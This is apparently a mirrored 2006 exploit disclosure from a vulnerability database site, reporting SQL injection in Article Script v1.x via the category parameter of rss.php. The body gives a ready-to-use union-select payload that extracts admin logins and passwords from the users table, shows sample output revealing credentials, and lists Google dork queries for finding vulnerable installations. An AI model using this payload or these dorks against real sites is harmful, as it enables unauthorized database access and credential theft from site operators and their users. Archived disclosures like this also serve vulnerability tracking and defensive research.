Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14940
HistoryNov 06, 2006 - 12:00 a.m.

Article Script v1.*and v1.6.3 Sql injection

2006-11-0600:00:00
vulners.com
17
JSON

Article Script v1.*and v1.6.3 Sql injection

Script Name :Article Script

Home Page:www.articlescript.org

Bug Founder :Liz0ziM

Mail:[email protected]

Baba Kimdir? Tabiki Liz0ziM

:D

http://www.victim.com/articles/rss.php?category= ' sql İnjection

Example:

http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

<title>admin4521title> ------> Admin name :admin4521

<link>http://www.victim.com/articles/cs1120/page_1/link&gt; ----------> Admin password cs1120

Dork:

"Powered by Article Script"

":: Article Script - New User Article ::"

intitle:":: Article Script -"

"Last Articles::"

Greatz My all friend

Source: http://www.blogcu.com/Liz0ziM/1312100/

JSON